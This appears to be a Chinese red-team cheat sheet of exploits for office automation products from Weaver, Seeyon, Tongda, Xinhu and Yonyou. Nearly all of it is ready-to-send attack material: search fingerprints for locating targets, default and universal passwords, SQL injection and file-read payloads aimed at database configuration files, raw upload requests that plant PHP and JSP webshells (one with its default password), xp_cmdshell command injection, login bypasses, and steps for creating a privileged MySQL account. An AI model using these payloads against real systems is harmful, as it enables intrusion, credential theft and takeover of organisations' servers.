泛微 OA weaver.common.Ctrl 存在任意文件上传漏洞，攻击者通过漏洞可以上传 webshell 文件控制服务器
相关文章

com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction 任意文件上传

相关文章
- 泛微e-cology任意文件上传(已修复)

weaver.workflow.exceldesign.ExcelUploadServlet 任意文件上传

相关文章
- 泛微e-cology另一接口任意文件上传(已修复)

/workrelate/plan/util/uploaderOperate.jsp + /OfficeServer 文件上传

POC | Payload | exp
- https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA uploaderOperate.jsp 文件上传.md

管理员任意登录

POC | Payload | exp

/mobile/plugin/VerifyQuickLogin.jsp

identifier=1&language=1&ipaddress=

e-bridge

fofa: app="泛微-云桥 e-Bridge"

泛微云桥 /wxjsapi/saveYZJFile 任意文件读取

描述
未授权任意文件读取,/wxjsapi/saveYZJFile 接口获取 filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。
相关文章
- 泛微云桥-任意文件读取深入利用

POC | Payload | exp

downloadUrl 参数修改成需要获取文件的绝对路径,记录返回包中的 id 值
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c:windows/win.ini&fileExt=txt

通过查看文件接口访问 /file/fileNoLogin/id

/file/fileNoLogin/xxxxxxxxxxxxxxxxx

参考安识科技 A-Team 利用方法,https://mp.weixin.qq.com/s/Y_2_e7HIWH3z5jhMsK7pZA

参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历”
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

常见路径
d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库

e-office

fofa: app="泛微-EOffice"

指纹

/general/login/index.php

相关文章

【攻防演练】某协同办公系统多个1day分析过程

CNVD-2021-49104 E-Office v9 任意文件上传漏洞

相关文章
POC | Payload | exp
- bigsizeme/CNVD-2021-49104

E-office do_excel.php任意文件写入漏洞

POC | Payload | exp

/WWW/general/charge/charge_list/do_excel.php

html=<?php system($_POST[pass]);?>

eoffice10 前台 getshell

POC | Payload | exp

查看版本 /eoffice10/version.json

<form method='post'
action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="1"/></br></br>
<button type=submit value="上传">上传</button> </form>

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

任意文件上传

POC | Payload | exp

/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save

后缀 xxx.php.

/attachment/xxxxx.php

全回显SSRF可RCE

POC | Payload | exp

/E-mobile/App/Ajax/ajax.php?action=dingtalkImg&result[]=http://x.x.x.x/1.php

/attachment/xxxxx.php

回显SSRF

POC | Payload | exp

/E-mobile/App/System/File/downfile.php?url=
Host: www.baidu.com

致远

官网 : http://www.seeyon.com/

Fofa : app="致远互联-OA"

相关文章

相关工具

致远OA数据库配置文件

/opt/Seeyon/A8/base/conf/datasourceCtp.properties

指纹

/seeyon/htmlofficeservlet
/seeyon/index.jsp
seeyon

默认口令

system/system
group-admin/123456
admin1/123456
gov-admin/123456
audit-admin/123456

致远OA Session泄漏漏洞

需登录账户,注入发生在search_result.jsp文件中的docTitle参数

POC | Payload | exp

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

致远OA A6 search_result.jsp sql注入漏洞

POC | Payload | exp

/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

致远OA A6 setextno.jsp sql注入漏洞

POC | Payload | exp

/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23

致远OA A6 重置数据库账号密码漏洞

POC | Payload | exp

/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}

致远OA A6 敏感信息泄露

POC | Payload | exp

/yyoa/createMysql.jsp
/yyoa/ext/createMysql.jsp
/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

致远 OA A6 test.jsp sql 注入漏洞

相关文章
- 用友致远A6 OA存在sql注入并拿shell
- 致远OA A6 test.jsp SQL注入漏洞

POC | Payload | exp

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database())
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)

致远OA A8 未授权访问

POC | Payload | exp

/seeyon/main.do?method=officeDown&filename=c:/boot.ini

致远OA A8 任意用户密码修改漏洞

相关文章
- 申通快递某系统存在任意用户密码修改漏洞 -wooyun-2016-0215609
- 风行在线某系统任意用户密码重置漏洞(管理员账号为例/涉及内部架构/文件等敏感信息) -wooyun-2016-0213554
POC | Payload | exp
```
/seeyon/services/authorityService?wsdl
```

致远OA A8-m 后台万能密码

POC | Payload | exp

www.test.com/seeyon/management/status.jsp
WLCCYBD@SEEYON

致远OA A8-v5 无视验证码撞库

描述
致远 A8-V5 在设计时存在逻辑错误，用户修改密码时对原密码进行了验证，但是验证使用的服务存在未授权访问漏洞，系统对非合法请求的原密码验证功能进行回应，导致了无视验证码，无需 login 页面进行密码尝试

POC | Payload | exp

GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0
Accept: */*
Accept-Language: zh-cn
Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame
requesttype: AJAX
Content-Type: application/x-www-form-urlencoded
Cookie: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.test.com
DNT: 1
Proxy-Connection: Keep-Alive

致远OA A8-v5 任意用户密码修改

描述
致远 A8-V5 在设计时存在逻辑错误，在上一步对原始密码进行验证后，下一步不再检测原始密码，从而直接修改用户密码，导致平行权限的越权漏洞。

POC | Payload | exp

POST /seeyon/individualManager.do?method=modifyIndividual HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 86
DNT: 1
Host: www.test.com
Cookie: JSESSIONID=DA71A65B3AAD45823A1FADAB80A3E685; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849,1419232608; avatarImageUrl=8469117046183055270; loginPageURL="/main.do"

individualName=admin&formerpassword=123456&nowpassword=wy123456&validatepass=wy123456

individualName为用户名

注意，此处需要以一个合法的JSESSIONID发送如上数据即可修改任意用户密码，合法的JSESSIONID由撞库得出。

致远OA帆软报表组件反射型XSS&SSRF

相关文章
- 致远OA帆软报表组件反射型XSS&SSRF漏洞

致远 OA 帆软报表组件前台 XXE 漏洞

相关文章
- 致远OA帆软报表组件前台XXE漏洞挖掘过程

A8-OA-seeyon-RCE

相关文章
POC | Payload | exp
- RayScri/A8-OA-seeyon-RCE

CNVD-2020-62422 webmail.do任意文件下载

影响版本
- 致远OA A6-V5
- 致远OA A8-V5
- 致远OA G6

POC | Payload | exp

http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=a.txt&filePath=../conf/datasourceCtp.properties

致远OA任意管理员登陆

相关文章
- 致远OA任意管理员登陆漏洞分析

CNVD-2021-01627 && 致远 OA ajax.do 登录绕过任意文件上传

相关文章
- 致远OA ajax.do登录绕过任意文件上传
- 致远OA ajaxAction formulaManager 文件上传漏洞

POC | Payload | exp

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded
Content-Length: 8819

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00

Webshell地址:https://xxxxx/seeyon/SeeyonUpdate1.jspx
冰蝎3 默认马pass：rebeyond

A5-V8 致远OA任意文件下载漏洞

相关文章
- 致远OA任意文件下载漏洞(已修复)

致远OA fastjson远程代码执行漏洞

相关文章
- 致远OA fastjson远程代码执行漏洞复现
- 致远伪0day_FastJson利用链

通达

官网 : https://www.tongda2000.com/
fofa: app="TDXK-通达OA"

指纹

tongda.ico
Office Anywhere 20xx版网络智能办公系统
/ispirit/interface/gateway.php
/mac/gateway.php

相关文章

相关工具

xinyu2428/TDOA_RCE - 通达OA综合利用工具
kitezzzGrim/tongda-exp - python编写的多个通达常见漏洞exp

通达oa 2007 sql注入漏洞

POC | Payload | exp

/general/document/index.php/setting/keywords/index

_SERVER[QUERY_STRING]=kname=1%2Band@``%2Bor%2Bif(substr(user(),1,4)=root,1,exp(710))#

通达oa 2011-2013 GETSHELL

POC | Payload | exp

/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

/general/email/index.php

/general/email/shell.php 密码C

2013、2015版本文件包含

POC | Payload | exp

www.test.com/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../inc/js/menu_left.js

头像常见路径: \MYOA\webroot\attachment\avatar\XXX.jpg

2013、2015版本 SQL 注入

POC | Payload | exp

www.test.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random

POST /general/document/index.php/recv/register/turn HTTP/1.1

_SERVER=&rid=1'

_SERVER=&rid=exp(if((1=1),1,710))

POST /general/document/index.php/recv/register/insert HTTP/1.1

title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=

2013、2015版本未授权访问

POC | Payload | exp

www.test.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3
www.test.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50

2013、2015版本敏感信息泄露

POC | Payload | exp

www.test.com/general/get_userinfo.php
www.test.com/general/ipanel/user/query.php
www.test.com/general/info/dept/

2013、2015版本 XSS

POC | Payload | exp
发送邮件、问题问答存在 XSS
```
<img src=x onerror=alert(1)>
```

2013、2015版本越权

POC | Payload | exp

www.test.com/interface/ugo.php?OA_USER=admin

www.test.com/general/system/database/
GET 转为 POST 加上参数 _SERVER=

2013、2015版本任意⽂件上传漏洞

POC | Payload | exp

<form enctype="multipart/form-data" action="http://www.test.com/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>

shell地址为 : www.test.com/general/vmeet/wbUpload/test.php

通达OA 11.2 后台getshell

系统管理-附件管理-添加存储目录
设置存储目录 (一般默认网站安装目录为 D:/MYOA/webroot/ 最后也有路径获取的地方，如果不设置会不在网站根目录下，无法直接访问附件)
寻找附件上传
通过.php. 绕过黑名单上传
根据返回结果拼接上传路径：/im/1912/383971046.test.php 直接访问(im是模块)

通达 OA 任意用户登录漏洞

影响版本
- 通达 OA 2017
- 通达 OA V11.X--V11.5
相关文章

POC | Payload | exp

NS-Sp4ce/TongDaOA-Fake-User

第一种利用方法
1. 拿到 uid
/general/login_code.php
/ispirit/login_code.php

2. 拿 cookie
POST /logincheck_code.php

codeuid={9E908086-342B-2A87-B0E9-E573E226302A}&uid=1

3. 访问验证
/general/index.php?is_modify_pwd=1

第二种利用方法
1. 首先访问 /ispirit/login_code.php 获取 codeuid。
/ispirit/login_code.php

2. 访问 /general/login_code_scan.php 提交 post 参数,拿到cookie
POST /general/logincheck_code.php

codeuid={9E908086-342B-2A87-B0E9-E573E226302A}&source=pc&uid=1&type=confirm&username=admin

3. 访问 /ispirit/login_code_check.php?codeuid=xxx
/ispirit/login_code_check.php?codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

3. 访问验证
/general/index.php?is_modify_pwd=1

通达oa 11.5 sql注入漏洞

POC | Payload | exp

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: https://www.0-sec.org/portal/home/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Connection: keep-alive
Host: www.0-sec.org
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 154
X-WVS-ID: Acunetix-Autologin/65535
Cache-Control: no-cache
Accept: */*
Origin: https://www.0-sec.org
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total=

/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total=

/general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag=

/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2

POST /general/file_folder/swfupload_new.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/
Connection: close
Host: 192.168.202.1
Content-Length: 391
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"

2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"

------------GFioQpMK0vv2--

POST /general/file_folder/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
X-Resource-Type: xhr
Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 82
x-wvs-id: Acunetix-Deepscan/209
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign

POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
X-Resource-Type: xhr
Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 97
x-wvs-id: Acunetix-Deepscan/186
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--

通达OA V11.5电子邮箱接口SQL注入复现

通达oa 11.5 未授权访问漏洞

POC | Payload | exp

/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay

通达 OA 任意文件上传漏洞+本地文件包含漏洞

相关文章
- 通达OA任意文件上传漏洞详细分析

详情

2013

/ispirit/im/upload.php
/ispirit/interface/gateway.php

2017
```
/ispirit/im/upload.php
/mac/gateway.php
```

POC | Payload | exp

jas502n/OA-tongda-RCE

POST /mac/gateway.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Connection: close
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

json={"url":"/general/../../mysql5/my.ini"}

通达OA v11.6 preauth RCE

描述
利用需要删除 auth.inc.php,可能会损坏OA系统
相关文章
- 通达OA11.6 preauth RCE 0day分析
POC | Payload | exp
- poc_and_exp/rce.py

通达OA v11.7 后台SQL注入

相关文章
- 通达OA v11.7后台SQL注入到RCE[0day]

POC | Payload | exp

需要登录权限

/general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=(SELECT count(*) FROM information_schema.columns A, information_schema.columns B where 1=1 and (LENGTH(database())=5))
/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

添加一个mysql用户
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

给创建的at666账户添加mysql权限
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));

刷新数据库登录到数据库
/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录
/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

通达OA v11.7 后台任意文件读取

POC | Payload | exp

/ispirit/im/photo.php?AVATAR_FILE=c:/oa/bin/redis.windows.conf&UID=1

通达OA v11.7 后台敏感信息泄露

POC | Payload | exp

/general/approve_center/archive/getTableStruc.php

通达OA v11.7 后台ssrf

POC | Payload | exp

/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=wqx0mc.dnslog.cn

通达OA v11.7 在线用户登录漏洞

POC | Payload | exp

http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
http://x.x.x.x/general/

通达oa 11.7 后台getshell

通达oa 11.8 后台getshell

相关文章
- 通达OA v11.8 存储型XSS 与命令执行
- 通达 OA 代码审计篇二：11.8 后台 Getshell
POC | Payload | exp
- z1un/TongdaOA-exp

通达OA v11.9 upsharestatus 后台SQL注入漏洞

POC | Payload | exp

POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uid=15&status=1&id=1;select sleep(4)

信呼

fofa: app="信呼-OA系统"

信呼 OA 存储型 XSS

影响版本
- 信呼 v1.9.0~1.9.1
相关文章
- 信呼OA存储型XSS 0day复现

用友

Fofa: app="用友-UFIDA-NC"

相关工具

jas502n/ncDecode - 用友nc数据库密码解密
kezibei/yongyou_nc_poc

相关文章

用友 UFIDA OA 信息泄露

POC | Payload | exp

/service/~iufo/com.ufida.web.action.ActionServlet? action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=
# 登录进去后再访问信息泄露的地址，就有权限上传文件了。然后返回主页直接查看发表的内容就行了。

用友 UFIDA OA 任意文件读取

Fofa: app="用友-UFIDA-NC"

POC | Payload | exp

/NCFindWeb?service=IPreAlertConfigService&filename=
